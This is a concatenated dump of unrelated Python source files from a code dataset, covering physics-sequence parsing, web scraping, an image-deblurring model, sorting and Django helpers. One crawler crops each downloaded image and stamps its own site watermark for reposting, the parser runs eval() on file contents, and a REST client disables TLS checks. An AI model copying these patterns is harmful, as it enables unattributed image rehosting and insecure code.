Load mapping from file(s).\n\n Args:\n seqfile_path: Saved Sequence file\n ret: return format, either \"tfs\" or \"dictionary\"\n\n Returns:\n Dictionary of orders containing either a\n DataFrame of magnets(index) vs. variables(columns)\n containing the variable-coefficients\n or a\n Dictionary of all variables containing magnet-coefficient Series\n \"\"\"\n _check_ret(ret)\n varmapfile_path = seqfile_path.replace(\".seq\", \"\").replace(\".\" + EXT, \"\")\n if ret == \"dictionary\":\n full_file_path = \"{f:s}.{e:s}\".format(f=varmapfile_path, e=EXT)\n with open(full_file_path, \"rb\") as varmapfile:\n mapping = pickle.load(varmapfile)\n LOG.debug(\"Loaded mapping from varmap file '{:s}'.\".format(full_file_path))\n\n elif ret == \"dataframe\":\n varmapfile_name = os.path.basename(varmapfile_path)\n order = []\n for f in os.listdir(os.path.dirname(varmapfile_path)):\n if f.startswith(varmapfile_name) and f.endswith(EXT):\n order += [f.replace(varmapfile_name + \".\", \"\").replace(\".\" + EXT, \"\")]\n\n if len(order) == 0:\n raise IOError(\"Could not find varmap files of scheme: '{f:s}.{o:s}.{e:s}'\".format(\n f=varmapfile_path, o=\"(order)\", e=EXT))\n\n mapping = dict.fromkeys(order)\n for o in order:\n full_file_path = \"{f:s}.{o:s}.{e:s}\".format(f=varmapfile_path, o=o, e=EXT)\n mapping[o] = tfs.read_tfs(full_file_path)\n LOG.debug(\"Loaded mapping from varmap file '{:s}'.\".format(full_file_path))\n return mapping\n\n\ndef save_variable_mapping(mapping, outfile_path, format=DEFAULT['return']):\n \"\"\" Save mapping to file(s).\n\n Args:\n mapping: The mapping to save\n outfile_path: Output File, either extension \"\",\".seq\",\".varmap\" will be changed to \".varmap\"\n format: mapping format, either \"tfs\" or \"dictionary\"\n \"\"\"\n _check_ret(format)\n varmapfile_path = outfile_path.replace(\".seq\", \"\").replace(\".\" + EXT, \"\")\n\n if format == \"dictionary\":\n full_file_path = \"{f:s}.{e:s}\".format(f=varmapfile_path, e=EXT)\n with open(full_file_path, \"wb\") as varmapfile:\n pickle.dump(mapping, varmapfile, -1)\n LOG.debug(\"Saved Variable mapping into file '{:s}'\".format(full_file_path))\n\n elif format == \"dataframe\":\n for order in mapping:\n full_file_path = \"{f:s}.{o:s}.{e:s}\".format(f=varmapfile_path, o=order, e=EXT)\n tfs.write_tfs(full_file_path,\n mapping[order],\n save_index=True)\n LOG.debug(\"Saved Variable mapping into file '{:s}'\".format(full_file_path))\n\n\ndef load_or_parse_variable_mapping(seqfile_path, ret=DEFAULT['return']):\n \"\"\" Load mapping, or parse if not found. Convenience wrapper for parse and load functions.\n\n Loads variable mapping from a file. If not found it will do the parsing instead and saves\n the results for later use.\n\n Args:\n seqfile_path: Saved Sequence file\n ret: return format, either \"tfs\" or \"dictionary\"\n\n Returns:\n Dictionary of orders containing either a\n DataFrame of magnets(index) vs. variables(columns)\n containing the variable-coefficients\n or a\n Dictionary of all variables containing magnet-coefficient Series\n\n \"\"\"\n _check_ret(ret)\n try:\n mapping = load_variable_mapping(seqfile_path, ret=ret)\n except IOError:\n mapping = parse_variable_mapping(seqfile_path, ret=ret)\n try:\n save_variable_mapping(mapping, seqfile_path, format=ret)\n except IOError as e:\n LOG.warn(\" IOError: {:s}.\".format(e.message))\n return mapping\n\n\ndef varmap_variables_to_json(varmap_or_file, outfile_path=None, format=DEFAULT['return']):\n \"\"\" Saves all variable names from mapping to json file.\n\n The variables will be saved by their order in the file.\n\n Args:\n varmap_or_file: varmap or saved varmap-file (sequence file is okay as well)\n format: varmap format, either \"tfs\" or \"dictionary\"\n \"\"\"\n _check_ret(format)\n LOG.debug(\"Converting varmap to json-file.\")\n if isinstance(varmap_or_file, basestring):\n mapping = load_or_parse_variable_mapping(varmap_or_file, ret=format)\n if outfile_path is None:\n outfile_path = varmap_or_file.replace(\".seq\", \"\").replace(\".\" + EXT, \"\") + \"_all_list.json\"\n else:\n mapping = varmap_or_file\n if outfile_path is None:\n IOError(\"Outputfile not given!\")\n\n json_dict = OrderedDict.fromkeys(sorted(mapping.keys()))\n for order in mapping:\n if format == \"dictionary\":\n json_dict[order] = sorted(mapping[order].keys())\n elif format == \"dataframe\":\n json_dict[order] = sorted(mapping[order].columns.tolist())\n\n json_dict[\"all\"] = sorted(list(set([var for order in json_dict for var in json_dict[order]])))\n\n json_dumps_readable(outfile_path, json_dict)\n LOG.debug(\"Variables saved to '{:s}'.\".format(outfile_path))\n\n\n\"\"\"\n============================= Read Sequence =============================\n\"\"\"\n\n\ndef _read_file_for_magnets(sequence_file):\n \"\"\" Read the file and return the magnet definitions and magnet lengths \"\"\"\n LOG.debug(\" Reading File\")\n length_constants = {}\n magnet_strings = {}\n with open(sequence_file, 'r') as f_seq:\n for line in f_seq:\n var_and_value = _find_element_length(line)\n if var_and_value is not None:\n length_constants[var_and_value[0]] = var_and_value[1]\n else:\n var_and_value = _find_magnet_strength(line)\n if var_and_value is not None:\n magnet_strings[var_and_value[0]] = var_and_value[1]\n return magnet_strings, length_constants\n\n\ndef _find_element_length(line):\n \"\"\" Search for length variable in line \"\"\"\n match = re.match(r\"const\\s(l\\.[^;]+)\", line)\n if match is not None:\n eq = match.group(1).replace(\" \", \"\")\n return eq.split(\"=\")\n else:\n return None\n\n\ndef _find_magnet_strength(line):\n \"\"\" Search for magnet strengths in line\n \"\"\"\n line = line.lower()\n matches = list(re.finditer(\n r\",\\s*k((?P[ns])l:=\\{(?P[^\\}]+)\\}|(?P\\d+s?):=(?P[^,]+))\", line))\n\n if len(matches) > 0:\n magnet = re.match(r\"[\\w.]*\", line).group(0)\n\n knl_dict = {}\n for match in matches:\n if match.group(\"knl\") is not None:\n skew = \"S\" if match.group('s') == \"s\" else \"\"\n knls = match.group('knl').split(',')\n for n, knl in enumerate(knls):\n try:\n float(knl) # check could also be \"len(knl) > 1\"\n except ValueError:\n ########## HACK TO AVOID DIPOLES AS THEY ARE DEFINED BY LRAD!\n # TODO: Find a way to change dipoles in MADX!?\n if n == 0 and not re.search(r\":\\s*multipole\\s*,\", line):\n return None\n ##############################################################\n order = \"K{n:d}{skew:s}L\".format(n=n, skew=skew)\n knl_dict[order] = knl.replace(\" \", \"\")\n else:\n if match.group(\"n\") in ['0', '0s']:\n # dipole strength are defined by their angles\n knl = re.search(r\"angle\\s*:=\\s*([^,]+)\", line).group(1)\n else:\n length = \"l.\" + re.search(r\":(?!=)\\s*([^,]+)\", line).group(1)\n knl = \"({kn:s}) * {l:s}\".format(kn=match.group(\"k\"), l=length)\n\n order = \"K{:s}L\".format(match.group(\"n\").upper())\n knl_dict[order] = knl.replace(\" \", \"\")\n\n return magnet, knl_dict\n else:\n return None\n\n\n\"\"\"\n============================= Build Mapping =============================\n\"\"\"\n\n\ndef _build_variable_mapping_df(magnet_strings, length_constants):\n \"\"\" Build the data frame representing the mapping variables to magnets and return as df\n SLOW!!\n \"\"\"\n LOG.debug(\" Building Dataframe Mapping\")\n var_to_mag = {}\n for magnet in magnet_strings:\n for order, value_string in magnet_strings[magnet].iteritems():\n if order not in var_to_mag:\n var_to_mag[order] = tfs.TfsDataFrame()\n\n k_dict = _eval_magnet_strength(value_string, length_constants)\n var_to_mag[order] = var_to_mag[order].append(\n tfs.TfsDataFrame([k_dict.values()],\n index=[magnet],\n columns=k_dict.keys()\n )).fillna(0)\n return var_to_mag\n\n\ndef _build_variable_mapping_dict(magnet_strings, length_constants):\n \"\"\" Build the data frame representing the mapping variables to magnets and return as dict\n Faster!\n \"\"\"\n LOG.debug(\" Building Dictionary Mapping\")\n var_to_mag = {}\n for magnet in magnet_strings:\n for order, value_string in magnet_strings[magnet].iteritems():\n if order not in var_to_mag:\n var_to_mag[order] = {}\n\n k_dict = _eval_magnet_strength(value_string, length_constants)\n for var in k_dict:\n try:\n var_to_mag[order][var].loc[magnet] = k_dict[var]\n except KeyError:\n var_to_mag[order][var] = pd.Series(k_dict[var], index=[magnet])\n return var_to_mag\n\n\ndef _eval_magnet_strength(k_string, length_constants):\n \"\"\" Evaluate the magnet-strength string and return dictionary with values \"\"\"\n # replace element-length multiplier by their value\n el_length = re.search(r\"l\\.[\\w.]+\", k_string)\n if el_length is not None:\n l_var = el_length.group(0)\n k_string = k_string.replace(l_var, length_constants[l_var])\n\n # get variable names\n variables = re.findall(r\"[a-zA-Z][\\w.]*\", k_string)\n d = {}\n for variable in variables:\n # replace current variable by 1 and all others by 0\n knl_temp = k_string\n for other in variables:\n knl_temp = knl_temp.replace(other, \"1\" if variable == other else \"0\")\n\n # evaluate coefficient (let python sort out parenthesis, order etc.)\n d[variable] = eval(knl_temp)\n\n return d\n\n\n\"\"\"\n============================= Helper =============================\n\"\"\"\n\n\ndef _check_ret(ret):\n \"\"\" Checks if the given 'ret' value is valid \"\"\"\n if ret not in DEFAULT[\"ret_choices\"]:\n ValueError(\"Return format '{ret:s}' unknown, choices: {choices:s}\".format(\n ret=ret, choices=\", \".join(DEFAULT[\"ret_choices\"])\n ))\n\n\nif __name__ == '__main__':\n # # Testing:\n # import os\n # seq_name = \"lhcb1_tmp.seq\"\n # df = load_or_parse_variable_mapping(os.path.join(\"tests\", seq_name))\n # varmap_variables_to_json(df, seq_name)\n raise EnvironmentError(\"{:s} is not meant to be run as main.\".format(__file__))\n\n","sub_path":"twiss_optics/sequence_parser.py","file_name":"sequence_parser.py","file_ext":"py","file_size_in_byte":13718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"437026144","text":"import string\n\nfrom bs4 import BeautifulSoup\nfrom scraper import Scraper\n\nimport utils\n\n\nclass SiteScraper:\n\n def __init__(self, name, start_date, end_date, driver):\n self.parsers = [self._parser]\n self.driver = driver\n self.scraper = None\n self.scraper_name = name\n self.start_date = start_date\n self.end_date = end_date\n\n def scrape_alphabet(self):\n self.scraper = Scraper(\n self.scraper_name,\n start_date=self.start_date,\n end_date=self.end_date\n )\n self.scraper.headers = [\n 'Grantor',\n 'Grantee',\n 'Recorded Date',\n 'Doc #',\n 'Doc Title',\n ]\n self.scraper.csvheaders = self.scraper.headers\n self.scraper.run(self.parsers)\n\n def _parser(self, start='', deeper=False):\n all_rows = []\n search_term_generator = self._generate_search_terms(start, deeper)\n\n for term in search_term_generator:\n result_html = self._search_for_term(term)\n rows = self._get_rows_from_html(result_html)\n if len(rows) > utils.MAXIMUM_RESULTS_PER_PAGE:\n all_rows.extend(self._parser(term, True))\n else:\n all_rows.extend(rows)\n\n return all_rows\n\n def _search_for_term(self, term):\n self.driver.get(utils.ROOT_URL)\n search_field = self.driver.find_element_by_id(utils.SEARCH_FIELD_ID)\n start_date = self.driver.find_element_by_id(utils.START_DATE_FIELD_ID)\n end_date = self.driver.find_element_by_id(utils.END_DATE_FIELD_ID)\n\n search_field.send_keys(term)\n start_date.send_keys(self.start_date)\n end_date.send_keys(self.end_date)\n\n self.driver.find_element_by_name(utils.SUBMIT_BUTTON_ID).click()\n\n return self.driver.page_source\n\n def _generate_search_terms(self, start='', deeper=False):\n if not start and not deeper:\n for letter in string.ascii_lowercase:\n yield letter\n elif start and deeper:\n for letter in string.ascii_lowercase:\n yield start + letter\n else:\n raise ValueError('Search term generator: wrong arguments!')\n\n def _get_rows_from_html(self, html):\n rows_dict = []\n\n soup = BeautifulSoup(html, \"html.parser\")\n for body_row in soup.select('table tr'):\n cells = body_row.findAll('td')\n element_contents = [element.contents[0] for element in cells]\n\n element_contents = map(utils.get_text, element_contents)\n\n elem = dict(zip(self.scraper.headers, element_contents))\n if not utils.is_element_valid(elem):\n continue\n\n rows_dict.append(elem)\n\n return rows_dict","sub_path":"site_scraper.py","file_name":"site_scraper.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649881310","text":"import numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom skimage.measure import compare_ssim as SSIM\n\nfrom util.metrics import PSNR\n\n\nclass Encoder(nn.Module):\n def __init__(self, inchans=1, nz=32):\n super(Encoder, self).__init__()\n self.convlist=nn.ModuleList([nn.Conv2d(inchans,32, kernel_size=4, stride=2, padding=1),#x/2\n nn.Conv2d(32, 32, kernel_size=4, stride=2, padding=1),#x/4 /2\n nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1),#x/4 /1\n nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=1),#x/8 /2\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),#x/8 /1\n nn.Conv2d(64, 128, kernel_size=4, stride=2, padding=1),#x/16 /2\n nn.Conv2d(128, 64, kernel_size=3, stride=1, padding=1),#x/16 /1\n nn.Conv2d(64, 32, kernel_size=3, stride=1, padding=1),#x/16 /1\n nn.Conv2d(32, nz, kernel_size=8, stride=1, padding=0)])#x/(16*8) /8\n def forward(self, x):\n for i, l in enumerate(self.convlist[:-1]):\n x=l(x)\n x=F.leaky_relu(x, negative_slope=0.2)\n \n out=self.convlist[-1](x)\n return out\nclass Decoder(nn.Module):\n def __init__(self, outchans=1, nz=32):\n super(Decoder, self).__init__()\n self.convlist=nn.ModuleList([\n nn.ConvTranspose2d(nz,32,kernel_size=8, stride=8, padding=0), #x8 \n nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1),#x1\n nn.Conv2d(64, 128, kernel_size=3, stride=1, padding=1),#x1\n nn.ConvTranspose2d(128, 64, kernel_size=4, stride=2, padding=1),#x2\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),#x1\n nn.ConvTranspose2d(64, 32, kernel_size=4, stride=2, padding=1),#x2\n nn.Conv2d(32, 32, kernel_size=3, stride=1, padding=1),#x1\n nn.ConvTranspose2d(32, 32, kernel_size=4, stride=2, padding=1),#x2\n nn.ConvTranspose2d(32,outchans, kernel_size=4, stride=2, padding=1)#x2\n ])\n def forward(self, x):\n for i, l in enumerate(self.convlist[:-1]):\n x=l(x)\n x=F.leaky_relu(x, negative_slope=0.2)\n \n out=self.convlist[-1](x)\n return out\nclass CAE(nn.Module):\n def __init__(self, inchans=3, nz=32):\n super(CAE, self).__init__()\n self.enc=Encoder(inchans=inchans, nz=nz)\n self.dec=Decoder(outchans=inchans, nz=nz)\n def forward(self, x):\n z=self.enc(x)\n out=self.dec(z)\n return out\n\n\nclass DeblurModel(nn.Module):\n def __init__(self):\n super(DeblurModel, self).__init__()\n\n def get_input(self, data):\n img = data['a']\n inputs = img\n targets = data['b']\n inputs, targets = inputs.cuda(), targets.cuda()\n return inputs, targets\n\n def tensor2im(self, image_tensor, imtype=np.uint8):\n image_numpy = image_tensor[0].cpu().float().numpy()\n #image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0\n image_numpy = (np.transpose(image_numpy, (1, 2, 0)))* 255.0\n return image_numpy.astype(imtype)\n\n def get_images_and_metrics(self, inp, output, target) -> (float, float, np.ndarray):\n inp = self.tensor2im(inp)\n fake = self.tensor2im(output.data)\n real = self.tensor2im(target.data)\n psnr = PSNR(fake, real)\n ssim = SSIM(fake, real, multichannel=True)\n vis_img = np.hstack((inp, fake, real))\n return psnr, ssim, vis_img\n\n\ndef get_model(model_config):\n return DeblurModel()\n","sub_path":"models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"270636423","text":"# Raspberry Pi Weather Station Temperature Processing\n# Created: July 27, 2017\n# By: Dan Kane\n \n# This workflow demonstrates how to create a processed stream which can be visualized\n# on the dashboard or used to trigger other workflows. The Raspberry Pi reports temperature\n# in Celsius. This workflow converts Celsius to Fahrenheit and creates a processed output\n# stream in Fahrenheit.\n \n \nTinC = float(IONode.get_input('in1')['event_data']['value'])\nTinF = round(TinC*1.8 + 32,2)\n \noutput_dict = {}\noutput_dict['Temp_Proc'] = TinF\nIONode.set_output('out1', output_dict)\n","sub_path":"workflow-code/process-temperature-workflow.py","file_name":"process-temperature-workflow.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156741884","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport time\nimport threading\nimport hashlib\nfrom urllib.parse import quote\nfrom multiprocessing import Pool, cpu_count\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom PIL import Image, ImageDraw, ImageFont\n\nHEADERS = {\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\n 'Referer': \"http://www.mmjpg.com\"\n}\n\n# DIR_PATH = r\"E:\\mmjpg\" # 下载图片保存路径\n\nDIR_PATH = r\"/application/image\"\n\n# 指定要使用的字体和大小;/Library/Fonts/是macOS字体目录;Linux的字体目录是/usr/share/fonts/\nfont = ImageFont.truetype(r\"./font/msyh.ttf\", 21)\n\n# 保存路径\nreques_url = r\"http://127.0.0.1:9999/lovehot/api/v1/rest/postImageData\"\n\n\ndef save_pic(pic_src, pic_cnt):\n \"\"\"\n 将图片下载到本地文件夹\n \"\"\"\n try:\n img = requests.get(pic_src, headers=HEADERS, timeout=60)\n img_name = \"love_img_{}.jpg\".format(pic_cnt + 1)\n with open(img_name, 'ab') as f:\n f.write(img.content)\n print(img_name)\n\n im = Image.open(img_name)\n # 图片的宽度和高度\n img_size = im.size\n # print(\"图片宽度和高度分别是{}\".format(img_size))\n w = img_size[0]\n h = img_size[1] - 22\n x = 0\n y = 0\n region = im.crop((x, y, w, h))\n region.save(img_name)\n add_text_to_image(region, img_name, 'h.love5868.com')\n except Exception as e:\n print(e)\n\n\n# image: 图片 text:要添加的文本 font:字体\ndef add_text_to_image(image, img_name, text, font=font):\n try:\n draw = ImageDraw.Draw(image)\n text_size_x, text_size_y = draw.textsize(text, font=font)\n # 设置文本文字位置\n text_xy = (image.size[0] - text_size_x - 10, image.size[1] - text_size_y - 20)\n draw.text(text_xy, text, (255, 0, 0), font=font) # 设置文字位置/内容/颜色/字体\n draw = ImageDraw.Draw(image)\n image.save(img_name)\n except Exception as e:\n print(\"水印异常=====>\")\n print(e)\n\n\ndef make_dir(folder_name):\n \"\"\"\n 新建套图文件夹并切换到该目录下\n \"\"\"\n path = os.path.join(DIR_PATH, folder_name)\n # 如果目录已经存在就不用再次爬取了,去重,提高效率。存在返回 False,否则反之\n if not os.path.exists(path):\n os.makedirs(path)\n print(path)\n os.chdir(path)\n return True\n print(\"Folder has existed!\")\n return False\n\n\ndef delete_empty_dir(save_dir):\n \"\"\"\n 如果程序半路中断的话,可能存在已经新建好文件夹但是仍没有下载的图片的\n 情况但此时文件夹已经存在所以会忽略该套图的下载,此时要删除空文件夹\n \"\"\"\n if os.path.exists(save_dir):\n if os.path.isdir(save_dir):\n for d in os.listdir(save_dir):\n path = os.path.join(save_dir, d) # 组装下一级地址\n if os.path.isdir(path):\n delete_empty_dir(path) # 递归删除空文件夹\n if not os.listdir(save_dir):\n os.rmdir(save_dir)\n print(\"remove the empty dir: {}\".format(save_dir))\n else:\n print(\"Please start your performance!\") # 请开始你的表演\n\n\nlock = threading.Lock() # 全局资源锁\n\n\ndef urls_crawler(url):\n \"\"\"\n 爬虫入口,主要爬取操作\n \"\"\"\n try:\n r = requests.get(url, headers=HEADERS, timeout=60).text\n # 套图名,也作为文件夹名\n folder_name = BeautifulSoup(r, 'lxml').find(\n 'h2').text.encode('ISO-8859-1').decode('utf-8')\n\n with lock:\n m = hashlib.md5(folder_name.encode(encoding='utf-8'))\n filename = m.hexdigest()[8:-8]\n if make_dir(filename):\n # 套图张数\n max_count = BeautifulSoup(r, 'lxml').find(\n 'div', class_='page').find_all('a')[-2].get_text()\n # 套图页面\n page_urls = [url + \"/\" + str(i) for i in\n range(1, int(max_count) + 1)]\n # 图片地址\n img_urls = []\n for index, page_url in enumerate(page_urls):\n result = requests.get(\n page_url, headers=HEADERS, timeout=60).text\n # 最后一张图片没有a标签直接就是img所以分开解析\n if index + 1 < len(page_urls):\n img_url = BeautifulSoup(result, 'lxml').find(\n 'div', class_='content').find('a').img['src']\n img_urls.append(img_url)\n else:\n img_url = BeautifulSoup(result, 'lxml').find(\n 'div', class_='content').find('img')['src']\n img_urls.append(img_url)\n\n for cnt, url in enumerate(img_urls):\n save_pic(url, cnt)\n\n print(len(img_urls))\n aItem = {}\n aItem[\"filename\"] = filename\n aItem[\"source\"] = \"mzitu\"\n aItem[\"title\"] = quote(folder_name, 'utf-8')\n aItem[\"typename\"] = folder_name\n aItem[\"imgsize\"] = len(img_urls)\n requests.post(reques_url, aItem, timeout=60).text\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n urls = ['http://mmjpg.com/mm/{cnt}'.format(cnt=cnt)\n for cnt in range(1, 953)]\n pool = Pool(processes=cpu_count()+10)\n try:\n delete_empty_dir(DIR_PATH)\n pool.map(urls_crawler, urls)\n except Exception:\n time.sleep(30)\n delete_empty_dir(DIR_PATH)\n pool.map(urls_crawler, urls)\n","sub_path":"mm_crawler.py","file_name":"mm_crawler.py","file_ext":"py","file_size_in_byte":5933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"468548705","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport inspect\nfrom django import template\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom .middlewares.ThreadLocal import get_current_request\n\n\ndef process_template_args(rawparams, context = None):\n\targs = []\n\tfor param in rawparams:\n\t\tpos = param.find('=')\n\t\tif (pos > 0):\n\t\t\tbreak\n\t\tif context is not None:\n\t\t\tparam = template.resolve_variable(param, context)\n\t\targs.append(param)\n\treturn args\n\n\ndef process_template_kwargs(rawparams, context = None):\n\tkwargs = {}\n\tfor param in rawparams:\n\t\tparamname = param\n\t\tparamvalue = ''\n\t\tpos = param.find('=')\n\t\tif (pos <= 0):\n\t\t\tcontinue\n\t\tparamname = param[:pos]\n\t\tparamvalue = param[pos + 1:]\n\t\tif context is not None:\n\t\t\tparamvalue = template.resolve_variable(paramvalue, context)\n\t\tkwargs[paramname] = paramvalue\n\treturn kwargs\n\n\ndef iterify(items):\n\ttry:\n\t\titer(items)\n\t\treturn items\n\texcept TypeError:\n\t\treturn [items]\n\n\ndef build_absolute_uri(path):\n\trequest = get_current_request()\n\tif request:\n\t\treturn request.build_absolute_uri(path)\n\telse:\n\t\tfrom django.conf import settings\n\t\tfrom django.contrib.sites.models import Site\n\t\treturn 'http://' + Site.objects.get(pk = settings.SITE_ID) + path\n\n\ndef clean_dir(path, root_path):\n\tpath = os.path.abspath(path)\n\troot_path = os.path.abspath(root_path)\n\n\tcurrent_dir = path\n\twhile len(os.path.split(current_dir)) and current_dir.startswith(root_path) and current_dir != root_path:\n\t\ttry:\n\t\t\tos.rmdir(current_dir)\n\t\texcept OSError:\n\t\t\treturn\n\t\tcurrent_dir = os.path.join(*os.path.split(current_dir)[:-1])\n\n\ndef get_meta(instance):\n\treturn getattr(instance, \"_meta\")\n\n\ndef get_default_manager(obj):\n\tif inspect.isclass(obj):\n\t\treturn getattr(obj, \"_default_manager\")\n\telse:\n\t\treturn getattr(obj.__class__, \"_default_manager\")\n\n\ndef reload_model(obj):\n\treturn get_default_manager(obj.__class__).get(pk=obj.pk)\n\n\n#def monkey_patch_safestring():\n#\tfrom django.utils.safestring import SafeData\n#\tSafeData.__html__ = lambda self: self\n#\n#\tfrom jinja2 import escape\n#\tfrom django.forms import BaseForm, Media\n#\tfrom django.forms.forms import BoundField\n#\tfrom django.forms.formsets import BaseFormSet\n#\tfrom django.forms.utils import ErrorDict, ErrorList\n#\n#\tfor cls in (BaseForm, Media, BoundField, BaseFormSet, ErrorDict, ErrorList):\n#\t\tcls.__html__ = lambda self: escape(unicode(self))\n#\n#\n#monkey_patch_safestring()\n#\n#\n#def monkey_patch_jinja2_getattr():\n#\tfrom jinja2.environment import Environment\n#\n#\tdef env_getattr(self, obj, attribute):\n#\t\ttry:\n#\t\t\treturn Environment.old_getattr(self, obj, attribute)\n#\t\texcept ObjectDoesNotExist as exc:\n#\t\t\treturn self.undefined(obj=obj, name=attribute, hint=unicode(exc))\n#\n#\tdef env_getitem(self, obj, attribute):\n#\t\ttry:\n#\t\t\treturn Environment.old_getitem(self, obj, attribute)\n#\t\texcept ObjectDoesNotExist as exc:\n#\t\t\treturn self.undefined(obj=obj, name=attribute, hint=unicode(exc))\n#\n#\tEnvironment.old_getattr = Environment.getattr\n#\tEnvironment.old_getitem = Environment.getitem\n#\tEnvironment.getattr = env_getattr\n#\tEnvironment.getitem = env_getitem\n#\n#\n#monkey_patch_jinja2_getattr()\n","sub_path":"common_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"38731853","text":"class InsertionSort(object):\n @staticmethod\n def find_insert_index(data, item):\n i = 0\n\n while ((i < len(data)) and \n (item > data[i])):\n i += 1\n\n return i\n\n @staticmethod\n def insert(data, item):\n \"\"\"Inserts item in ordered list, preserving order.\"\"\"\n idxToPlace = InsertionSort.find_insert_index(data, item)\n\n # grow data by 1 element\n data.append(0)\n\n i = len(data) - 1\n\n while (i > idxToPlace):\n data[i] = data[i - 1]\n i -= 1\n\n data[idxToPlace] = item\n\n\n @staticmethod\n def sort(data):\n newData = []\n\n # start w/ the first element going into newData\n newData.append(data[0])\n\n # look at each item in data\n # place at correct location in newData\n # bumping elements up as needed\n for dataIdx in range(1, len(data)):\n valToInsert = data[dataIdx]\n\n InsertionSort.insert(newData, valToInsert)\n\n return newData","sub_path":"InsertionSort/insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315016502","text":"import numpy as np\nimport cv2\n\nimport matplotlib.pylab as plt\nimport argparse\nimport io\nimport os\nimport sys\nimport time\n\nimport picamera\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\n\nfrom PIL import Image\nfrom tflite_runtime.interpreter import Interpreter\n\n# devuelve un diccionario con todas las clases\ndef load_labels(path):\n with open(path, 'r') as f:\n return {i: line.strip() for i, line in enumerate(f.readlines())}\n\n\ndef clasificar_imagen(interpreter,imagen,top_k=1):\n \n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n \n input_shape = input_details[0]['shape']\n input_data = np.array(imagen, dtype=np.float32)\n interpreter.set_tensor(input_details[0]['index'], input_data)\n \n interpreter.invoke()\n\n output = np.squeeze(interpreter.get_tensor(output_details[0]['index']))\n \n ordered = np.argpartition(-output, top_k)\n return [(i, output[i]) for i in ordered[:top_k]]\n \n\ndef main():\n \n # de aqui para asignar la ruta del modelo desde la terminal\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--model', help='File path of .tflite file.', required=True)\n parser.add_argument(\n '--labels', help='File path of labels file.', required=True)\n args = parser.parse_args()\n \n \n #pathLabels=('/home/pi/Documents/labels.txt') \n #pathTflite=('/home/pi/Documents/RaspberryLite/Proyecto Final/Classifier_best_val_accuracy.tflite')\n \n labels = load_labels(args.labels)\n \n \n interpreter = Interpreter(args.model)\n interpreter.allocate_tensors()\n \n camera = PiCamera()\n camera.resolution = (640, 480)\n camera.framerate = 30\n rawCapture = PiRGBArray(camera, size=(640, 480)) \n \n \n captura = cv2.VideoCapture('/home/pi/Documents/WhatsApp Video 2020-10-26 at 8.40.23 AM.mp4')\n\n while (captura.isOpened()):\n \n ret, imagen = captura.read()\n\n if ret == True:\n \n\n frame=cv2.cvtColor(imagen, cv2.COLOR_BGR2RGB)\n \n \n \n Imagen_normed = frame/ 255\n \n \n Imagen_show = cv2.resize(imagen, (600, 600))\n \n Imagen_resized = cv2.resize(Imagen_normed, (224, 224))\n Imagen_espnaded=np.expand_dims(Imagen_resized, axis=0)\n \n \n start_time = time.time()\n \n results = clasificar_imagen(interpreter, Imagen_espnaded)\n\n elapsed_ms = round((time.time() - start_time) * 1000,2)\n\n label_id, prob = results[0]\n \n print(labels[label_id]+\" \"+str(elapsed_ms)) \n font = cv2.FONT_HERSHEY_SIMPLEX\n color=(14,129,60)\n images = cv2.putText(Imagen_show,str(elapsed_ms)+\"ms \"+labels[label_id]+\" \"+str(prob) , (00,100), font, 1,color,2, cv2.LINE_AA) \n \n\n cv2.imshow(\"Frame\", images)\n \n \n # salir si se preciona q \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n \n cv2.destroyAllWindows()\n \nif __name__ == '__main__':\n main()","sub_path":"tfliteDemoVideo.py","file_name":"tfliteDemoVideo.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136728614","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport requests\nimport sys\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n\nclass UnauthorizedException(Exception):\n pass\n\n\nclass RestGraphqlApi(object):\n \"\"\"Representation of REST connection.\"\"\"\n\n token = None\n authorized = False\n\n def __init__(self, host='localhost', verify=False, user='admin', password=None):\n self.host = host\n self.verify = verify\n self.user = user\n self.password = password\n\n def get(self, location, authorization_required=True):\n \"\"\"Get data per REST API.\"\"\"\n url = 'https://{}/api/v1/{}'.format(self.host, location.strip('/'))\n headers = {\n 'Content-Type': 'application/json',\n }\n if authorization_required:\n if not self.authorized:\n self.login()\n if self.token:\n headers['Authorization'] 